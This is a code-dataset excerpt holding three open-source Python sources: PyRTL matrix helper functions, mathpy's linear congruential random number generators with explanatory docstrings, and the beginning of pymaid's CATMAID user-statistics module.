if isinstance(matrix, WireVector):
return matrix
if not isinstance(matrix, Matrix):
raise PyrtlError('error: expecting a Matrix or Wirevector for matrix, '
'got %s instead' % type(matrix))
if not isinstance(bits, int) and bits is not None:
raise PyrtlError('error: expecting an int/None for bits, '
'got %s instead' % type(bits))
if not isinstance(axis, int) and axis is not None:
raise PyrtlError('error: expecting an int or None for axis, '
'got %s instead' % type(axis))
if bits is None:
bits = matrix.bits
if bits <= 0:
raise PyrtlError('error: bits cannot be negative or zero, '
'got %s instead' % bits)
if axis is None:
inputs = []
for i in range(matrix.rows):
for j in range(matrix.columns):
inputs.append(matrix[i, j])
return reduce(min_2, inputs)
if axis == 0:
result = Matrix(1, matrix.columns, signed=matrix.signed, bits=bits)
for i in range(matrix.columns):
inputs = []
for j in range(matrix.rows):
inputs.append(matrix[j, i])
result[0, i] = reduce(min_2, inputs)
return result
if axis == 1:
result = Matrix(1, matrix.rows, signed=matrix.signed, bits=bits)
for i in range(matrix.rows):
inputs = []
for j in range(matrix.columns):
inputs.append(matrix[i, j])
result[0, i] = reduce(min_2, inputs)
return result
raise PyrtlError('Axis invalid: expected (None, 0, or 1), got %s' % axis)
def max(matrix, axis=None, bits=None):
''' Returns the max value in a matrix.
:param Matrix/Wirevector matrix: the matrix to perform max operation on.
If it is a wirevector, it will return itself
:param None/int axis: The axis to perform the operation on
None refers to max of all items. 0 is max of the columns. 1 is max of rows.
Defaults to None
:param int bits: The bits per value of the max. Defaults to bits of old matrix
:return: A WireVector or Matrix representing the max value
'''
def max_2(first, second):
return select(first > second, first, second)
if isinstance(matrix, WireVector):
return matrix
if not isinstance(matrix, Matrix):
raise PyrtlError('error: expecting a Matrix or WireVector for matrix, '
'got %s instead' % type(matrix))
if not isinstance(bits, int) and bits is not None:
raise PyrtlError('error: expecting an int/None for bits, '
'got %s instead' % type(bits))
if not isinstance(axis, int) and axis is not None:
raise PyrtlError('error: expecting an int or None for axis, '
'got %s instead' % type(axis))
if bits is None:
bits = matrix.bits
if bits <= 0:
raise PyrtlError('error: bits cannot be negative or zero, '
'got %s instead' % bits)
if axis is None:
inputs = []
for i in range(matrix.rows):
for j in range(matrix.columns):
inputs.append(matrix[i, j])
return reduce(max_2, inputs)
if axis == 0:
result = Matrix(
1, matrix.columns, signed=matrix.signed, bits=bits)
for i in range(matrix.columns):
inputs = []
for j in range(matrix.rows):
inputs.append(matrix[j, i])
result[0, i] = reduce(max_2, inputs)
return result
if axis == 1:
result = Matrix(
1, matrix.rows, signed=matrix.signed, bits=bits)
for i in range(matrix.rows):
inputs = []
for j in range(matrix.columns):
inputs.append(matrix[i, j])
result[0, i] = reduce(max_2, inputs)
return result
raise PyrtlError('Axis invalid: expected (None, 0, or 1), got %s' % axis)
def argmax(matrix, axis=None, bits=None):
''' Returns the index of the max value of the matrix.
:param Matrix/Wirevector matrix: the matrix to perform argmax operation on.
If it is a WireVector, it will return itself
:param None/int axis: The axis to perform the operation on.
None refers to argmax of all items. 0 is argmax of the columns. 1 is argmax of rows.
Defaults to None
:param int bits: The bits per value of the argmax. Defaults to bits of old matrix
:return: A WireVector or Matrix representing the argmax value
NOTE: If there are two indices with the same max value, this function
picks the first instance.
'''
if isinstance(matrix, WireVector):
return Const(0)
if not isinstance(matrix, Matrix):
raise PyrtlError('error: expecting a Matrix or Wirevector for matrix, '
'got %s instead' % type(matrix))
if not isinstance(bits, int) and bits is not None:
raise PyrtlError('error: expecting an int/None for bits, '
'got %s instead' % type(bits))
if not isinstance(axis, int) and axis is not None:
raise PyrtlError('error: expecting an int or None for axis, '
'got %s instead' % type(axis))
if bits is None:
bits = matrix.bits
if bits <= 0:
raise PyrtlError('error: bits cannot be negative or zero, '
'got %s instead' % bits)
max_number = max(matrix, axis=axis, bits=bits)
if axis is None:
index = Const(0)
arg = matrix.rows * matrix.columns - 1
for i in reversed(range(matrix.rows)):
for j in reversed(range(matrix.columns)):
index = select(
max_number == matrix[i, j], Const(arg), index)
arg -= 1
return index
if axis == 0:
result = Matrix(
1, matrix.columns, signed=matrix.signed, bits=bits)
for i in range(matrix.columns):
local_max = max_number[0, i]
index = Const(0)
arg = matrix.rows - 1
for j in reversed(range(matrix.rows)):
index = select(
local_max == matrix[j, i], Const(arg), index)
arg -= 1
result[0, i] = index
return result
if axis == 1:
result = Matrix(
1, matrix.rows, signed=matrix.signed, bits=bits)
for i in range(matrix.rows):
local_max = max_number[0, i]
index = Const(0)
arg = matrix.columns - 1
for j in reversed(range(matrix.columns)):
index = select(
local_max == matrix[i, j], Const(arg), index)
arg -= 1
result[0, i] = index
return result
def dot(first, second):
''' Performs the dot product on two matrices.
:param Matrix first: the first matrix
:param Matrix second: the second matrix
:return: a PyRTL Matrix that contains the dot product of the two PyRTL Matrices
Specifically, the dot product on two matrices is
* If either first or second are WireVectors/have both rows and columns
equal to 1, it is equivalent to multiply
* If both first and second are both arrays (have rows or columns equal to 1),
it is inner product of vectors.
* Otherwise it is the matrix multiplaction between first and second
NOTE: Row vectors and column vectors are both treated as arrays
'''
if not isinstance(first, (WireVector, Matrix)):
raise PyrtlError('error: expecting a Matrix, '
'got %s instead' % type(first))
if not isinstance(second, (WireVector, Matrix)):
raise PyrtlError('error: expecting a Matrix/WireVector, '
'got %s instead' % type(second))
# First case when it is multiply
if isinstance(first, WireVector):
if isinstance(second, WireVector):
return first * second
return second[:, :] * first
if isinstance(second, WireVector):
return first[:, :] * second
if (first.rows == 1 and first.columns == 1) \
or (second.rows == 1 and second.columns == 1):
return first[:, :] * second[:, :]
# Second case when it is Inner Product
if first.rows == 1:
if second.rows == 1:
return sum(first * second)
if second.columns == 1:
return sum(first * second.transpose())
elif first.columns == 1:
if second.rows == 1:
return sum(first * second.transpose())
if second.columns == 1:
return sum(first * second)
# Third case when it is Matrix Multiply
return first.__matmul__(second)
def hstack(*matrices):
""" Stack matrices in sequence horizontally (column-wise).
:param list[Matrix] matrices: a list of matrices to concatenate one after another horizontally
:return Matrix: a new Matrix, with the same number of rows as the original, with
a bitwidth equal to the max of the bitwidths of all the matrices
All the matrices must have the same number of rows and same 'signed' value.
For example::
m1 = Matrix(2, 3, bits=5, value=[[1,2,3],
[4,5,6]])
m2 = Matrix(2, 1, bits=10, value=[[17],
[23]]])
m3 = hstack(m1, m2)
m3 looks like::
[[1,2,3,17],
[4,5,6,23]]
"""
if len(matrices) == 0:
raise PyrtlError("Must supply at least one matrix to hstack()")
if any([not isinstance(matrix, Matrix) for matrix in matrices]):
raise PyrtlError("All arguments to hstack must be matrices.")
if len(matrices) == 1:
return matrices[0].copy()
new_rows = matrices[0].rows
if any([m.rows != new_rows for m in matrices]):
raise PyrtlError("All matrices being hstacked together must have the same number of rows")
new_signed = matrices[0].signed
if any([m.signed != new_signed for m in matrices]):
raise PyrtlError("All matrices being hstacked together must have the same signedness")
new_cols = builtins.sum(m.columns for m in matrices)
new_bits = builtins.max(m.bits for m in matrices)
new_max_bits = builtins.max(m.max_bits for m in matrices)
new = Matrix(new_rows, new_cols, new_bits, max_bits=new_max_bits)
new_c = 0
for matrix in matrices:
for c in range(matrix.columns):
for r in range(matrix.rows):
new[r, new_c] = matrix[r, c]
new_c += 1
return new
def vstack(*matrices):
""" Stack matrices in sequence vertically (row-wise).
:param list[Matrix] matrices: a list of matrices to concatenate one after another vertically
:return Matrix: a new Matrix, with the same number of columns as the original, with
a bitwidth equal to the max of the bitwidths of all the matrices
All the matrices must have the same number of columns and same 'signed' value.
For example::
m1 = Matrix(2, 3, bits=5, value=[[1,2,3],
[4,5,6]])
m2 = Matrix(1, 3, bits=10, value=[[7,8,9]])
m3 = vstack(m1, m2)
m3 looks like::
[[1,2,3],
[4,5,6],
[7,8,9]]
"""
if len(matrices) == 0:
raise PyrtlError("Must supply at least one matrix to hstack()")
if any([not isinstance(matrix, Matrix) for matrix in matrices]):
raise PyrtlError("All arguments to vstack must be matrices.")
if len(matrices) == 1:
return matrices[0].copy()
new_cols = matrices[0].columns
if any([m.columns != new_cols for m in matrices]):
raise PyrtlError("All matrices being vstacked together must have the "
"same number of columns")
new_signed = matrices[0].signed
if any([m.signed != new_signed for m in matrices]):
raise PyrtlError("All matrices being hstacked together must have the same signedness")
new_rows = builtins.sum(m.rows for m in matrices)
new_bits = builtins.max(m.bits for m in matrices)
new_max_bits = builtins.max(m.max_bits for m in matrices)
new = Matrix(new_rows, new_cols, new_bits, max_bits=new_max_bits)
new_r = 0
for matrix in matrices:
for r in range(matrix.rows):
for c in range(matrix.columns):
new[new_r, c] = matrix[r, c]
new_r += 1
return new
def concatenate(matrices, axis=0):
""" Join a sequence of matrices along an existing axis.
:param list[Matrix] matrices: a list of matrices to concatenate one after another
:param int axix: axis along which to join; 0 is horizontally, 1 is vertically (defaults to 0)
:return: a new Matrix composed of the given matrices joined together
This function essentially wraps hstack/vstack.
"""
if axis == 0:
return hstack(*matrices)
elif axis == 1:
return vstack(*matrices)
else:
raise PyrtlError("Only allowable axes are 0 or 1")
def matrix_wv_to_list(matrix_wv, rows, columns, bits):
''' Convert a wirevector representing a matrix into a Python list of lists.
:param WireVector matrix_wv: result of calling to_wirevector() on a Matrix object
:param int rows: number of rows in the matrix matrix_wv represents
:param int columns: number of columns in the matrix matrix_wv represents
:param int bits: number of bits in each element of the matrix matrix_wv represents
:return list[list[int]]: a Python list of lists
This is useful when printing the value of a wire you've inspected
during Simulation that you know represnts a matrix.
Example::
values = [[1, 2, 3], [4, 5, 6]]
rows = 2
cols = 3
bits = 4
m = Matrix.Matrix(rows, cols, bits, values=values)
output = Output(name='output')
output <<= m.to_wirevector()
sim = Simulation()
sim.step({})
raw_matrix = Matrix.matrix_wv_to_list(sim.inspect('output'), rows, cols, bits)
print(raw_matrix)
# Produces:
# [[1, 2, 3], [4, 5, 6]]
'''
value = bin(matrix_wv)[2:].zfill(rows * columns * bits)
result = [[0 for _ in range(columns)]
for _ in range(rows)]
bit_pointer = 0
for i in range(rows):
for j in range(columns):
int_value = int(value[bit_pointer: bit_pointer + bits], 2)
result[i][j] = int_value
bit_pointer += bits
return result
def list_to_int(matrix, n_bits):
''' Convert a Python matrix (a list of lists) into an integer.
:param list[list[int]] matrix: a pure Python list of lists representing a matrix
:param int n_bits: number of bits to be used to represent each element; if an
element doesn't fit in n_bits, it truncates the most significant bits
:return int: a N*n_bits wide wirevector containing the elements of `matrix`,
where N is the number of elements in `matrix`
Integers that are signed will automatically be converted to their two's complement form.
This function is helpful for turning a pure Python list of lists
into a integer suitable for creating a Constant wirevector that can
be passed in to as a Matrix intializer's `value` argument, or for
passing into a Simulation's step function for a particular input wire.
For example, calling Matrix.list_to_int([3, 5], [7, 9], 4) produces 13,689,
which in binary looks like this::
0011 0101 0111 1001
Note how the elements of the list of lists were added, 4 bits at a time,
in row order, such that the element at row 0, column 0 is in the most significant
4 bits, and the element at row 1, column 1 is in the least significant 4 bits.
Here's an example of using it in simulation::
a_vals = [[0, 1], [2, 3]]
b_vals = [[2, 4, 6], [8, 10, 12]]
a_in = pyrtl.Input(4 * 4, 'a_in')
b_in = pyrtl.Input(6 * 4, 'b_in')
a = Matrix.Matrix(2, 2, 4, value=a_in)
b = Matrix.Matrix(2, 3, 4, value=b_in)
...
sim = pyrtl.Simulation()
sim.step({
'a_in': Matrix.list_to_int(a_vals)
'b_in': Matrix.list_to_int(b_vals)
})
'''
if n_bits <= 0:
raise PyrtlError("Number of bits per element must be positive, instead got %d" % n_bits)
result = 0
for i in range(len(matrix)):
for j in range(len(matrix[0])):
val = formatted_str_to_val(str(matrix[i][j]), 's' + str(n_bits))
result = (result << n_bits) | val
return result
|
bsd-3-clause
| 5,829,635,579,326,780,000
| 37.966429
| 99
| 0.54151
| false
| 4.166259
| false
| false
| false
|
aschleg/mathpy
|
mathpy/random/random.py
|
1
|
12138
|
# encoding=utf8
import random
import sys
import numpy as np
from mathpy.numtheory import isrelativelyprime
def lcg(n, seed=None):
r"""
Implementation of a linear congruential generator for generating n random samples in U(0, 1).
Parameters
----------
n : int
The number of random samples to generate
seed : int, default None
Returns
-------
array-like
numpy array of length :math:`n` of randomly generated numbers in the range :math:`U(0, 1)`.
Raises
------
ValueError
number of randomly generated values to return must be at least one.
Notes
-----
Linear congruential generators (LCGs) are a class of pseudorandom number generator (PRNG)
algorithms used for generating sequences of random-like numbers. The generation of random
numbers plays a large role in many applications ranging from cryptography to Monte Carlo
methods. Linear congruential generators are one of the oldest and most well-known methods
for generating random numbers primarily due to their comparative ease of implementation
and speed and their need for little memory. Other methods such as the Mersenne Twister are
much more common in practical use today.
Linear congruential generators are defined by a recurrence relation:
.. math::
\large{X_{i+1} = (aX_i + c) \space \text{mod} \space m}
There are many choices for the parameters :math:`m`, the modulus, :math:`a`, the multiplier,
and :math:`c` the increment. Wikipedia has a seemingly comprehensive list of the parameters
in common use here:
https://en.wikipedia.org/wiki/Linear_congruential_generator#Parameters_in_common_use
References
----------
Saucier, R. (2000). Computer Generation of Statistical Distributions (1st ed.).
Aberdeen, MD. Army Research Lab.
"""
rn = np.empty(n, np.float64)
m = 2 ** 32
a = 1103515245
c = 12345
if seed is None:
d = random.randrange(sys.maxsize)
else:
d = seed
d = (a * d + c) % m
for i in np.arange(n - 1):
d = (a * d + c) % m
rn[i] = d / m
return rn
def mcg(n, seed=None):
r"""
Implementation of a Lehmer random number generator, also known as a multiplicative congruential
generator for generating n random samples in U(0, 1).
Parameters
----------
n : int, default 10
The number of random samples to generate
Returns
-------
array-like:
numpy array of length :math`n` of randomly generated numbers in the range :math:`U(0, 1)`.
Notes
-----
Multiplicative congruential generators, also known as Lehmer random number generators, is a
type of linear congruential generator for generating pseudorandom numbers in :math:`U(0, 1)`.
The multiplicative congruential generator, often abbreviated as MLCG or MCG, is defined as a
recurrence relation similar to the LCG with :math:`c = 0`.
.. math::
X_{i+1} = aX_i \space \text{mod} \space m
Unlike the LCG, the parameters :math:`a` and :math:`m` for multiplicative congruential generators are more
restricted and the initial seed :math:`X_0` must be relatively prime to the modulus :math:`m` (the greatest
common divisor between :math:`X_0` and :math:`m` is :math:`0`). The current parameters in common use are
:math:`m = 2^{31} - 1 = 2,147,483,647 \text{and} a = 7^5 = 16,807`. However, in a correspondence from
the Communications of the ACM, Park, Miller and Stockmeyer changed the value of the parameter
:math:`a`, stating:
"The minimal standard Lehmer generator we advocated had a modulus of m = 2^31 - 1 and a multiplier
of a = 16807. Relative to this particular choice of multiplier, we wrote "... if this paper were
to be written again in a few years it is quite possible that we would advocate a different
multiplier .... " We are now prepared to do so. That is, we now advocate a = 48271 and, indeed,
have done so "officially" since July 1990. This new advocacy is consistent with the discussion on
page 1198 of [10]. There is nothing wrong with 16807; we now believe, however, that 48271 is a little
better (with q = 44488, r = 3399).
When using a large prime modulus :math:`m` such as :math:`2^{31} - 1`, the multiplicative
congruential generator can overflow. Schrage's method was invented to overcome the possibility
of overflow and is based on the fact that :math:`a(m \space \text{mod} \space a) < m`. We can
check the parameters in use satisfy this condition:
Schrage's method restates the modulus :math:`m1` as a decomposition :math:`m = aq + r` where
:math:`r = m \space \text{mod} \space a` and :math:`q = m / a`.
.. math::
ax \space \text{mod} \space m = \begin{cases}
a(x \space \text{mod} \space q) - r\frac{x}{q} & \text{if} \space x \space \text{is} \geq 0 \\
a(x \space \text{mod} \space q) - r\frac{x}{q} + m & \text{if} \space x \space \text{is} \leq 0 \end{cases}
References
----------
Anne Gille-Genest (March 1, 2012).
Implementation of the Pseudo-Random Number Generators and the Low Discrepancy Sequences.
Saucier, R. (2000). Computer Generation of Statistical Distributions (1st ed.). Aberdeen, MD. Army Research Lab.
Stephen K. Park; Keith W. Miller; Paul K. Stockmeyer (1988). "Technical Correspondence".
Communications of the ACM. 36 (7): 105-110.
"""
rn = np.empty(n, dtype=np.float64)
m = 2147483647
a = 48271 # 16807
q = 44488 # 127773
r = 3399 # 2836
if seed is None:
s = random.randrange(sys.maxsize)
else:
s = seed
while isrelativelyprime(s, m) is False:
s += 1
for i in np.arange(n):
h = s / q
l = s % q
t = a * l - r * h
if t > 0:
s = t
else:
s = t + m
rn[i] = s / m
return rn
def clcg_32bit(n, seed=None):
r"""
Implementation of a combined linear congruential generator suited for 32-bit processors as proposed by
L'Ecuyer.
Parameters
----------
n : int
The number of random samples to generate
Returns
-------
array-like
numpy array of length :math`n` of randomly generated numbers in the range :math:`U(0, 1)`.
Notes
-----
Combined linear congruential generators are a type of PRNG (pseudorandom number generator) that combine
two or more LCGs (linear congruential generators). The combination of two or more LCGs into one random
number generator can result in a marked increase in the period length of the generator which makes them
better suited for simulating more complex systems. The combined linear congruential generator algorithm is
defined as:
.. math::
X_i \equiv \Bigg(\sum^k_{j=1} (-1)^{j-1} Y_{i,j} \Bigg) \space (\text{mod} \space (m_1 - 1))
Where :math:`m_1` is the modulus of the LCG, :math:`Y_{i,j}` is the :math:`ith` input from the :math:`jth`
LCG and :math:`X_i` is the :math:`ith` random generated value.
L'Ecuyer describes a combined linear generator that utilizes two LCGs in *Efficient and Portable Combined
Random Number Generators* for 32-bit processors. To be precise, the congruential generators used are
actually multiplicative since :math:`c_1 = c_2 = 0`. The parameters used for the MCGs are:
.. math::
a_1 = 40014 \qquad m_1 = 2147483563 \qquad a_2 = 40692 \qquad m_2 = 2147483399
The combined linear congruential generator algorithm proposed by L'Ecuyer can be described with the
following steps:
The two MCGs, :math:`Y_{0,1}, \space Y_{0,2}`, are seeded. The seed values are recommended to be in the
range :math:`[1, m_1 - 1]` and :math:`[1, m_2 - 1]`, respectively.
Next, the two MCGs are evaluated using the algorithm above:
.. math::
Y_{i+1,1} = a_1 \times Y_{i,1} (\text{mod} \space m_1) \qquad Y_{i+1,2} = a_1 \times Y_{i,2}
(\text{mod} \space m_2)
With :math:`Y_{i+1,1} \text{and} Y_{i+1,2}` evaluated, find :math:`X_{i+1}`
.. math::
X_{i+1} = (Y_{i+1,1} - Y_{i+1,2}) \space \text{mod} \space m_1 - 1
Finally, the random number to be output can be generated:
.. math::
R_{i+1} = \begin{cases} \frac{X_{i+1}}{m_1} & \text{for} \space X_{i+1} > 0 \\
(\frac{X_{i+1}}{m_1}) + 1 & \text{for} \space X_{i+1} < 0 \\
\frac{(m_1 - 1)}{m_1} & \text{for} \space X_{i+1} = 0 \end{cases}
References
----------
Combined Linear Congruential Generator. (2017, July 5). In Wikipedia, The Free Encyclopedia.
From https://en.wikipedia.org/w/index.php?title=Combined_Linear_Congruential_Generator&oldid=789099445
Pierre L'Ecuyer (1988). Efficient and Portable Combined Random Number Generators.
Communications of the ACM. 31: 742â749, 774. doi:10.1145/62959.62969
Pierre L'Ecuyer, (1999) Good Parameters and Implementations for Combined Multiple Recursive Random Number Generators.
Operations Research 47(1):159-164. doi.org/10.1287/opre.47.1.159
"""
rn = np.empty(n, dtype=np.float64)
random.seed(seed)
a1, a2 = 40014, 40692
m1, m2 = 2147483563, 2147483399
y1, y2 = random.randrange(1, m1 - 1), random.randrange(1, m2 - 1)
for i in np.arange(n):
y1, y2 = a1 * y1 % m1, a2 * y2 % m2
x = (y1 - y2) % (m1 - 1)
if x > 0:
r = x / m1
elif x < 0:
r = (x / m1) + 1
else: # x == 0
r = (m1 - 1) / m1
rn[i] = r
return rn
def clcg_16bit(n, seed=None):
r"""
Implementation of a combined linear congruential generator suited for 16-bit processors as proposed by
L'Ecuyer.
Parameters
----------
n : int
The number of random samples to generate
Returns
-------
list or float
If n is greater than 1, a list of the generated random values is returned. If n is equal to 1, the
generated value is returned as float.
Notes
-----
The 16-bit version of the combined linear congruential generator proceeds in the same way as the 32-bit
version but uses three MCGs with the following parameters:
.. math::
a_1 = 157 \qquad m_1 = 32363 \qquad a_2 = 146 \qquad m_2 = 31727 \qquad a_3 = 142 \qquad m_3 = 31657
See Also
--------
clcg_32bit() : Function
32-bit implementation of a combined linear congruential generator as proposed by L'Ecuyer.
References
----------
Combined Linear Congruential Generator. (2017, July 5). In Wikipedia, The Free Encyclopedia.
From https://en.wikipedia.org/w/index.php?title=Combined_Linear_Congruential_Generator&oldid=789099445
Pierre L'Ecuyer (1988). Efficient and Portable Combined Random Number Generators.
Communications of the ACM. 31: 742â749, 774. doi:10.1145/62959.62969
Pierre L'Ecuyer, (1999) Good Parameters and Implementations for Combined Multiple Recursive Random Number Generators.
Operations Research 47(1):159-164. doi.org/10.1287/opre.47.1.159
"""
rn = np.empty(n, dtype=np.float64)
random.seed(seed)
a1, a2, a3 = 157, 146, 142
m1, m2, m3 = 32363, 31727, 31657
y1, y2, y3 = random.randrange(1, m1 - 1), \
random.randrange(1, m2 - 1), \
random.randrange(1, m3 - 1)
for i in np.arange(n):
y1, y2, y3 = a1 * y1 % m1, \
a2 * y2 % m2, \
a3 * y3 % m3
x = (y1 - y2 - y3) % (m1 - 1)
if x > 0:
r = x / m1
elif x < 0:
r = (x / m1) + 1
else: # x == 0
r = (m1 - 1) / m1
rn[i] = r
return rn
|
mit
| 6,682,255,296,660,250,000
| 33.682353
| 121
| 0.607896
| false
| 3.369064
| false
| false
| false
|
schlegelp/pymaid
|
pymaid/user_stats.py
|
1
|
48870
|
# This script is part of pymaid (http://www.github.com/schlegelp/pymaid).
# Copyright (C) 2017 Philipp Schlegel
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along
"""This module contains functions to retrieve user statistics.
Examples
--------
>>> import pymaid
>>> myInstance = pymaid.CatmaidInstance('https://www.your.catmaid-server.org',
... api_token='YOURTOKEN',
... http_user='HTTP_PASSWORD', # omit if not required
... http_password='TOKEN')
>>> skeleton_ids = pymaid.get_skids_by_annotation('Hugin')
>>> cont = pymaid.get_user_contributions(skeleton_ids)
>>> cont
user nodes presynapses postsynapses
0 Schlegel 47221 470 1408
1 Tran 1645 7 4
2 Lacin 1300 1 20
3 Li 1244 5 45
...
>>> # Get the time that each user has invested
>>> time_inv = pymaid.get_time_invested(skeleton_ids,
... remote_instance = myInstance)
>>> time_inv
user total creation edition review
0 Schlegel 4649 3224 2151 1204
1 Tran 174 125 59 0
2 Li 150 114 65 0
3 Lacin 133 119 30 0
...
>>> # Plot contributions as pie chart
>>> import plotly
>>> fig = {"data": [{"values": time_inv.total.tolist(),
... "labels": time_inv.user.tolist(),
... "type": "pie"}]}
>>> plotly.offline.plot(fig)
"""
# TODOs
# - Github punch card-like figure
import datetime
import pandas as pd
import numpy as np
from . import core, fetch, utils, config
# Set up logging
logger = config.logger
__all__ = ['get_user_contributions', 'get_time_invested', 'get_user_actions',
'get_team_contributions', 'get_user_stats']
def get_user_stats(start_date=None, end_date=None, remote_instance=None):
"""Get user stats similar to the pie chart statistics widget in CATMAID.
Returns cable [nm], nodes created/reviewed and connector links created.
Parameters
----------
start_date : tuple | datetime.date, optional
end_date : tuple | datetime.date, optional
Start and end date of time window to check. If
``None``, will use entire project history.
remote_instance : CatmaidInstance, optional
Either pass explicitly or define globally.
Returns
-------
pandas.DataFrame
Dataframe in which each row represents a user::
cable nodes_created nodes_reviewed links_created
username
user1 ...
user2 ...
Examples
--------
Create a pie chart similar to the stats widget in CATMAID:
>>> import matplotlib.pyplot as plt
>>> stats = pymaid.get_user_stats()
>>> stats_to_plot = ['cable', 'nodes_created', 'nodes_reviewed',
... 'links_created']
>>> fig, axes = plt.subplots(1, len(stats_to_plot), figsize=(12, 4))
>>> for s, ax in zip(stats_to_plot, axes):
... # Get the top 10 contributors for this stat
... this_stats = stats[s].sort_values(ascending=False).iloc[:10]
... # Calculate "others"
... this_stats.loc['others'] = stats[s].sort_values(ascending=False).iloc[10:].sum()
... # Plot
... this_stats.plot.pie(ax=ax, textprops={'size': 6},
... explode=[.05] * this_stats.shape[0],
... rotatelabels=True)
... # Make labels a bit smaller
... ax.set_ylabel(s.replace('_', ' '), fontsize=8)
>>> plt.show()
See Also
--------
:func:`~pymaid.get_history`
Returns day-by-day stats.
"""
remote_instance = utils._eval_remote_instance(remote_instance)
if isinstance(start_date, type(None)):
start_date = datetime.date(2010, 1, 1)
elif not isinstance(start_date, datetime.date):
start_date = datetime.date(*start_date)
if isinstance(end_date, type(None)):
end_date = datetime.date.today()
elif not isinstance(end_date, datetime.date):
end_date = datetime.date(*end_date)
# Get and summarize other stats
hist = fetch.get_history(remote_instance=remote_instance,
start_date=start_date,
end_date=end_date)
stats = pd.concat([hist.cable.sum(axis=1),
hist.treenodes.sum(axis=1),
hist.reviewed.sum(axis=1),
hist.connector_links.sum(axis=1)],
axis=1, sort=True).fillna(0).astype(int)
stats.index.name = 'username'
stats.columns = ['cable', 'nodes_created', 'nodes_reviewed',
'links_created']
stats.sort_values('nodes_created', ascending=False, inplace=True)
return stats
def get_team_contributions(teams, neurons=None, remote_instance=None):
"""Get contributions by teams (nodes, reviews, connectors, time invested).
Notes
-----
1. Time calculation uses defaults from :func:`pymaid.get_time_invested`.
2. ``total_reviews`` > ``total_nodes`` is possible if nodes have been
reviewed multiple times by different users. Similarly,
``total_reviews`` = ``total_nodes`` does not imply that the neuron
is fully reviewed!
Parameters
----------
teams dict
Teams to group contributions for. Users must be logins.
Format can be either:
1. Simple user assignments. For example::
{'teamA': ['user1', 'user2'],
'team2': ['user3'], ...]}
2. Users with start and end dates. Start and end date
must be either ``datetime.date`` or a single
``pandas.date_range`` object. For example::
{'team1': {
'user1': (datetime.date(2017, 1, 1),
datetime.date(2018, 1, 1)),
'user2': (datetime.date(2016, 6, 1),
datetime.date(2017, 1, 1)
}
'team2': {
'user3': pandas.date_range('2017-1-1',
'2018-1-1'),
}}
Mixing both styles is permissible. For second style,
use e.g. ``'user1': None`` for no date restrictions
on that user.
neurons skeleton ID(s) | CatmaidNeuron/List, optional
Restrict check to given set of neurons. If
CatmaidNeuron/List, will use this neurons nodes/
connectors. Use to subset contributions e.g. to a given
neuropil by pruning neurons before passing to this
function.
remote_instance : CatmaidInstance, optional
Either pass explicitly or define globally.
Returns
-------
pandas.DataFrame
DataFrame in which each row represents a neuron. Example for two teams,
``teamA`` and ``teamB``::
skeleton_id total_nodes teamA_nodes teamB_nodes ...
0
1
total_reviews teamA_reviews teamB_reviews ...
0
1
total_connectors teamA_connectors teamB_connectors ...
0
1
total_time teamA_time teamB_time
0
1
Examples
--------
>>> from datetime import date
>>> import pandas as pd
>>> teams = {'teamA': ['user1', 'user2'],
... 'teamB': {'user3': None,
... 'user4': (date(2017, 1, 1), date(2018, 1, 1))},
... 'teamC': {'user5': pd.date_range('2015-1-1', '2018-1-1')}}
>>> stats = pymaid.get_team_contributions(teams)
See Also
--------
:func:`~pymaid.get_contributor_statistics`
Gives you more basic info on neurons of interest
such as total reconstruction/review time.
:func:`~pymaid.get_time_invested`
Time invested by individual users. Gives you more
control over how time is calculated.
"""
remote_instance = utils._eval_remote_instance(remote_instance)
# Prepare teams
if not isinstance(teams, dict):
raise TypeError('Expected teams of type dict, got '
'{}'.format(type(teams)))
beginning_of_time = datetime.date(1900, 1, 1)
today = datetime.date.today()
all_time = pd.date_range(beginning_of_time, today)
for t in teams:
if isinstance(teams[t], list):
teams[t] = {u: all_time for u in teams[t]}
elif isinstance(teams[t], dict):
for u in teams[t]:
if isinstance(teams[t][u], type(None)):
teams[t][u] = all_time
elif isinstance(teams[t][u], (tuple, list)):
try:
teams[t][u] = pd.date_range(*teams[t][u])
except BaseException:
raise Exception('Error converting "{}" to pandas.'
'date_range'.format(teams[t][u]))
elif isinstance(teams[t][u],
pd.core.indexes.datetimes.DatetimeIndex):
pass
else:
TypeError('Expected user dates to be either None, tuple '
'of datetimes or pandas.date_range, '
'got {}'.format(type(teams[t][u])))
else:
raise TypeError('Expected teams to be either lists or dicts of '
'users, got {}'.format(type(teams[t])))
# Get all users
all_users = [u for t in teams for u in teams[t]]
# Prepare neurons - download if neccessary
if not isinstance(neurons, type(None)):
if isinstance(neurons, core.CatmaidNeuron):
neurons = core.CatmaidNeuronList(neurons)
elif isinstance(neurons, core.CatmaidNeuronList):
pass
else:
neurons = fetch.get_neurons(neurons,
remote_instance=remote_instance)
else:
all_dates = [d.date() for t in teams for u in teams[t] for d in teams[t][u]]
neurons = fetch.find_neurons(users=all_users,
from_date=min(all_dates),
to_date=max(all_dates),
remote_instance=remote_instance)
neurons.get_skeletons()
# Get user list
user_list = fetch.get_user_list(remote_instance=remote_instance).set_index('login')
for u in all_users:
if u not in user_list.index:
raise ValueError('User "{}" not found in user list'.format(u))
# Get all node details
all_node_details = fetch.get_node_details(neurons,
remote_instance=remote_instance)
# Get connector links
link_details = fetch.get_connector_links(neurons, remote_instance=remote_instance)
# link_details contains all links. We have to subset this to existing
# connectors in case the input neurons have been pruned
link_details = link_details[link_details.connector_id.isin(neurons.connectors.connector_id.values)]
interval = 3
bin_width = '%iMin' % interval
minimum_actions = 10 * interval
stats = []
for n in config.tqdm(neurons, desc='Processing',
disable=config.pbar_hide, leave=config.pbar_leave):
# Get node details
tn_ids = n.nodes.node_id.values.astype(str)
cn_ids = n.connectors.connector_id.values.astype(str)
current_status = config.pbar_hide
config.pbar_hide = True
node_details = all_node_details[all_node_details.node_id.isin(np.append(tn_ids, cn_ids))]
config.pbar_hide = current_status
# Extract node creation
node_creation = node_details.loc[node_details.node_id.isin(tn_ids),
['creator', 'creation_time']].values
node_creation = np.c_[node_creation, ['node_creation'] * node_creation.shape[0]]
# Extract connector creation
cn_creation = node_details.loc[node_details.node_id.isin(cn_ids),
['creator', 'creation_time']].values
cn_creation = np.c_[cn_creation, ['cn_creation'] * cn_creation.shape[0]]
